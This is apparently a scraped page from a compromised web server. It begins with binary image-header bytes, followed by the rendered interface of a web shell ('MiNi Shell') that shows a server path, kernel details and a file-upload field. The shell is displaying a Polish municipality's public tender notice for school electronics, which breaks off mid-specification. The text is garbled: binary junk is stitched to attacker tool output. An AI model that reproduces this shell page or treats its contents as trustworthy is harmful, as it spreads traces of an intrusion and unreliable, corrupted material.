JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241011/0054187901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu elektronicznego w ramach projektu – Gmina Sławno – kraina edukacyjnych możliwości </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sławno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979909</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">I Pułku Ułanów 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sławno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 59 810 75 26</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 59 810 75 26</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaslawno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://ug.slawno.ibip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu elektronicznego w ramach projektu – Gmina Sławno – kraina edukacyjnych możliwości </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0a02d780-cd0d-4b9a-a890-6f61aac47eed</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00541879</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00018860/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa sprzętu elektronicznego w ramach projektu „Gmina Sławno – kraina edukacyjnych możliwości”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Niniejsze zamówienie współfinansowane jest ze środków Europejskiego Funduszu Społecznego Plus oraz budżetu państwa w ramach Regionalnego Programu Fundusze Europejskie dla Pomorza Zachodniego 2021-2027, priorytet FEPZ.06 Fundusze Europejskie na rzecz aktywnego Pomorza Zachodniego, Działanie FEPZ.06.09 Edukacja ogólna w związku z realizacją projektu „Gmina Sławno – kraina edukacyjnych możliwości”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0a02d780-cd0d-4b9a-a890-6f61aac47eed <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. <br/>2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>3.	Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-0a02d780-cd0d-4b9a-a890-6f61aac47eed.<br/>4.	Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). <br/>5.	Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-0a02d780-cd0d-4b9a-a890-6f61aac47eed.<br/>6.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>7.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>8.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>9.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>10.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/>1)	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub <br/>2)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). <br/>11.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>c. d. w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L z 2016 r. Nr 119 poz. 1 i z 2018 r. Nr 127 poz. 2), zwanym dalej „RODO” informujemy, że:<br/>1.	administratorem danych osobowych jest Gmina Sławno – Urząd Gminy Sławno, 76-100 Sławno, ul. I Pułku Ułanów 11, tel. +48 59 810 75 26, <br/>e-mail: sekretariat@gminaslawno.pl;<br/>2.	we wszelkich sprawach związanych z ochroną danych osobowych można kontaktować się z inspektorem danych osobowych, e-mail: odo@gminaslawno.pl, tel. 59 810 75 26 lub na adres wskazany powyżej;<br/>3.	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego pn. „Dostawa sprzętu elektronicznego w ramach projektu – Gmina Sławno – kraina edukacyjnych możliwości” RSSA.271.24.2024, prowadzonym w trybie przetargu nieograniczonego oraz jego realizacji;<br/>4.	dane osobowe mogą zostać przekazane / powierzone osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania przetargowego w oparciu o art. 18, 19, 74, 75 i 76 ustawy Pzp oraz podmiotom, które na mocy obowiązujących przepisów prawa mogą dokonywać oceny, weryfikacji i kontroli prowadzonego postępowania i realizacji zadania, w tym w szczególności dokumentacji związanej z pozyskiwaniem środków finansowych pochodzących z budżetu państwa i Unii Europejskiej;<br/>5.	dane osobowe nie będą przekazywane poza teren Polski / UE / Europejskiego Obszaru Gospodarczego;<br/>6.	dane osobowe będą przechowywane przez okres wynikający z obowiązujących terminów archiwizacji, w tym w szczególności w oparciu o zapisy ustawy z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (Dz. U. z 2020 r. poz. 2320 z późn. zm.), ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn. zm.) oraz ustawy Pzp;<br/>7.	obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, a konsekwencje ich niepodania wynikają z ustawy Pzp; <br/>8.	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, o którym mowa w art. 22 RODO;<br/>9.	osoba, której dane dotyczą ma prawo do:<br/>1)	dostępu do danych na podstawie art. 15 RODO;<br/>2)	sprostowania danych zgodnie z zapisami art. 16 RODO;<br/>3)	żądania ograniczenia przetwarzania danych osobowych na podstawie art. 18 RODO z wyjątkiem przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10.	osoba, której dane dotyczą nie ma prawa do:<br/>1)	usunięcia danych osobowych w związku z art. 17 ust. 3 lit. B, d i e RODO;<br/>2)	przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	sprzeciwu, wobec przetwarzania danych osobowych na podstawie art. 21 RODO, gdyż podstawą przetwarzania danych jest art. 6 ust. 1 lit. c i e RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RSSA.271.24.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa sprzętu elektronicznego w ramach projektu „Gmina Sławno – kraina edukacyjnych możliwości”. <br/>2.	Przedmiot dostawy powinien zostać dostarczony zgodnie z podziałem na części i zadania pod adresy placówek wskazane poniżej:<br/>1)	Szkoła Podstawowa im. gen. Augusta Emila Fieldorfa ps. „Nil” w Bobrowicach, Bobrowice 22, 76-100 Sławno;<br/>2)	Szkoła Podstawowa im. Jana Kochanowskiego w Sławsku, Sławsko 97a, 76-100 Sławno;<br/>3)	Szkoła Podstawowa im. Żołnierzy Armii Krajowej w Warszkowie, Warszkowo, ul. Szkolna 17, 76-100 Sławno;<br/>4)	Szkoła Podstawowa we Wrześnicy, Wrześnica 19a, 76-122 Wrześnica;<br/>5)	Szkoła Podstawowa Im. Gen. Stefana Roweckiego &#34;Grota&#34; w Żukowie, Żukowo 65, 76-124 Żukowo.<br/>3.	Część nr 1 – Sprzęt elektroniczny:<br/>1)	ZADANIE NR 1 – Szkoła Podstawowa w Bobrowicach:<br/>a)	Wizualizer – 1 szt.:<br/>	Ilość pikseli (efektywna) – 8M;<br/>	Rozdzielczość (efektywna) – Full HD 1080p (1920 x 1080) Mpix;<br/>	Częstotliwość odświeżania – 60 klatek/s;<br/>	Zoom cyfrowy – 16 x;<br/>	Obszar skanowania – 400 x 300 mm;<br/>	Fokus – automatyczny/ręczny; <br/>	Oświetlenie zewnętrzne – 1 x; <br/>	Typ oświetlenia – LED;<br/>	Waga maks. – 1 kg; <br/>	Wymagane akcesoria – torba;<br/>	Typ głowicy – składane ramię.<br/>b)	Kamera – 1 szt.:<br/>	Całkowita liczba pikseli – 2,5 Mpix;<br/>	Ekran – LCD;<br/>	Zoom optyczny – 50 x;<br/>	Zoom cyfrowy – 150 x;<br/>	Nagrywanie filmów – avchd, mp4 w rozdzielczości 1920x1080;<br/>	Nośnik zapisu – karta SD/SDHC/SDXC;<br/>	Złącza – HDMI, USB.<br/>c)	Reflektory – 1 kpl.:<br/>	Zestaw – projektor, stroboskop, moonoflower, laser;<br/>	Projektor LED RGBW 12 diod LED o mocy 1 W;<br/>	Stroboskop LED SMB 120 diod;<br/>	Moonoflower z diodami LED RGBWA 60 x 5 mm;<br/>	Laser koloru czerwonego i zielonego;<br/>	Pilot do zdalnego sterowania;<br/>	T-bar do umieszczenia reflektorów;<br/>	Tryby pracy – DMX512, auto, dźwięk;<br/>	Wysokość statywu – 200 cm.<br/>2)	ZADANIE NR 2 – Szkoła Podstawowa w Sławsku:<br/>a)	Kamera zewnętrzna o wysokiej rozdzielczości do obserwacji wzrostu roślin – 1 szt. – zestaw monitoringu – uruchomienie i szkolenie z obsługi 1h: <br/>	4 kamery tubowa FullHD zoom 1080P;<br/>	Rozdzielczość kamery – 2 Mpix;<br/>	Rejestrator dedykowany do obsługi 4 kamer;<br/>	Kompresja obrazu H.265;<br/>	Dysk twardy 1 TB przeznaczony do monitoringu praca 24 h;<br/>	Przewody pomiędzy kamerami a rejestratorem 5 m;<br/>	Zestaw gotowy do pracy zawierający wszystkie niezbędne elementy do podłączenia i uruchomienia nagrywania z 4 kamer.<br/>b)	Zestaw nagłośnieniowy z mikrofonem głównym i doręcznym – 1 szt.:<br/>	Mikser: moc wzmacniacza 2x200 W; ilość kanałów: 8; rodzaj gniazd wejściowych: Jack 6.35 mm i XLR; czułość: 10 dB – 60 dB; złącza USB; komunikacja Bluetooth; wyjścia XLR i Jack 6.35 mm;<br/>	Mikrofon i zestaw mikrofonu doręcznego z mikrofonem analogowym (+ klip krawatowy): dwa nadajniki mikrofonu bezprzewodowego; mikrofon doręczny, mikrofon nagłowny + nadajnik bodypack (w zestawie mikrofon nagłowny + mikrofon krawatowy); baza mikrofonowa – odbiornik; przyłącze Jack 6,35 mm; zasilacz sieciowy; baterie; pasmo przenoszenia: UHF; zasięg dedykowany przez producenta: 30 m;<br/>	4 kolumny estradowe: moc max: 300 W; moc RMS: 100 W; pasmo: 60 Hz – 20 kHz; impedancja: 8 Ohm; magnes: 30 Oz; mocowanie na statyw; rączka przykręcana w górnej części obudowy przykręcana (w zestawie); gniazda speakon: x 2 (równoległe); membrana głośnika wysokotonowego typu C: 25 mm, tytanowa PTC; głośnik basowy – 20 cm, 8&#34;; cewka głośnika basowego – 1,5&#34;;<br/>	4 statywy: regulowana wysokość 120 – 190 cm; rozstaw nóg względem siebie: 100 cm x 100 cm x 100 cm; wymiary podstawy stojaka do kabiny akustycznej: 18 cm x 12 cm; średnica elementu wysuwanego – 3,5cm;<br/>	Zestaw okablowania i przyłączy – umożliwi połączenie elementów zestawu w całość, a dodatkowe redukcje oraz przyłącza dadzą możliwość skorzystania z kanałów miksera do podłączenia laptopa, telefonu czy innego źródła dźwięku za pomocą przewodu.<br/>c)	Mikrofony bezprzewodowe – 1 kpl.:<br/>	Skład zestawu: odbiornik – baza odbiorcza, nadajnik – 4 szt.: 4 x nadajnik bezprzewodowy mocowany na klips + mikrofony (4 nagłowne typu pałąk i 4 klipsy krawatowe), przewód sygnałowy, zasilacz sieciowy, antena, baterie AA, instrukcja obsługi;<br/>	Zakres częstotliwości nośnej – 500 – 600 mhz;<br/>	Pasmo przenoszenia – 80 Hz – 15 khz;<br/>	Stabilność częstotliwości – ± 0.005%;<br/>	Stosunek S/N – &gt; 90 db;<br/>	Liczba kanałów – 4 kanały;<br/>	Czułość odbioru 4 kanałów – &gt; 90 db;<br/>	Maksymalny zasięg deklarowany przez producenta / maksymalny zasięg uzyskany w testach – 40m / 80 m;<br/>	Zasilacz odbiornika – AC 110 – 240 V;<br/>	Zasilanie nadajnika – dwie baterie 1,5 V;<br/>	Moc nadawania – 10 mw;<br/>	Typ wyjścia – zbalansowany lub MIX;<br/>	Zasilanie nadajnika baterie – 2 x AA;<br/>	Wbudowana antena;<br/>	Wyjście RF – wysokie 30 mw, niskie 10 mw;<br/>	Baterie – 2 x AA.<br/>d)	Kamera – 1 szt.:<br/>	Całkowita liczba pikseli – 2,5 Mpix;<br/>	Ekran – LCD;<br/>	Zoom optyczny – 50 x;<br/>	Zoom cyfrowy – 150 x;<br/>	Nagrywanie filmów – avchd, mp4 w rozdzielczości 1920x1080;<br/>	Nośnik zapisu – karta SD/SDHC/SDXC;<br/>	Złącza – HDMI, USB.<br/>e)	Statyw – 1 szt.:<br/>	Konstrukcja aluminiowa w kolorze czarnym;<br/>	Głowica z obrotem prawo-lewo, pochylenie przód-tył;<br/>	Gwint statywy ¼ cala z szybkozłączką;<br/>	Zakres pracy – 60-160 cm;<br/>	Udźwig – 5 kg;<br/>	Gumowe końcówki nóg;<br/>	Pokrowiec na statyw.<br/>f)	Interaktywna Ścianka – 1 szt. – min. 80 gier w pakiecie: <br/>	Jasność projektora – 3200 ANSI;<br/>	Obsługa za pomocą pilota;<br/>	Projektor w poziomie – TAK;<br/>	Komplet piłek w zestawie.<br/>3)	ZADANIE NR 3 – Szkoła Podstawowa w Warszkowie:<br/>a)	Zestaw głośników do komputera – 2 kpl.:<br/>	Typ zestawu – 2.1;<br/>	Liczba głośników – 3; <br/>	Moc głośników (RMS) – niskotonowego 30W, satelitarnego 15W;<br/>	Komunikacja bezprzewodowa – Tak; <br/>	Pilot – Tak; <br/>	Komunikacja bezprzewodowa – Tak;<br/>	Maksymalne pasmo przenoszenia [kHz] – 20;<br/>	Minimalne pasmo przenoszenia [Hz] – 50; <br/>	Zasilacz – sieciowy; <br/>	Rodzaj złącza – Bluetooth, Jack 3.5mm, USB; <br/>	Wejście liniowe audio – Tak; <br/>	Wyjście słuchawkowe – Nie.<br/>b)	Mobilny zestaw nagłośnieniowy z mikrofonami – 1 kpl.:<br/>	Skład zestawu: wbudowany wzmacniacz, 2 mikrofony bezprzewodowe, 1 mikrofon przewodowy, zasilacz sieciowy i baterie, pilot;<br/>	Moc wyjściowa – 250 W;<br/>	Pasmo pracy – 863 – 865 Mhz;<br/>	Pasmo przenoszenia – 20 Hz- 20 kHz;<br/>	THD – &lt;0.1%;<br/>	Rozmiar głośnika – 8&#34;;<br/>	Zasilanie – 230 Vac/50 Hz or 12 Vdc;<br/>	Bateria – 12 V/12 Ah (4 – 6 Hours);<br/>	Wymiary – 280x 350x 620 mm;<br/>	Waga maksymalna – 19 kg;<br/>	Port USB/ SD/ MMC;<br/>	Odtwarzacz Bluetooth;<br/>	Funkcją echo i delay dla mikrofonów;<br/>	Odtwarzacz CD i MP3 z zabezpieczeniami antywstrząsowymi;<br/>	Zdalne sterowanie (pilot);<br/>	Wejście mikrofonowe Jack 6.35 mm;<br/>	Wbudowany akumulator z wejściem 12 Vdc;<br/>	Teleskopowa rączka i kółka;<br/>	Wejście – External audio 3.5 mm Jack;<br/>	Gwarancja – 36 miesięcy.<br/>c)	Mikrofony bezprzewodowe – 1 kpl.:<br/>	Skład zestawu: odbiornik – baza odbiorcza, nadajnik – 4 szt.: 4 x nadajnik bezprzewodowy mocowany na klips + mikrofony (4 nagłowne typu pałąk i 4 klipsy krawatowe), przewód sygnałowy, zasilacz sieciowy, antena, baterie AA, instrukcja obsługi;<br/>	Zakres częstotliwości nośnej – 500 – 600 MHz;<br/>	Pasmo przenoszenia – 80 Hz – 15 kHz;<br/>	Stabilność częstotliwości – 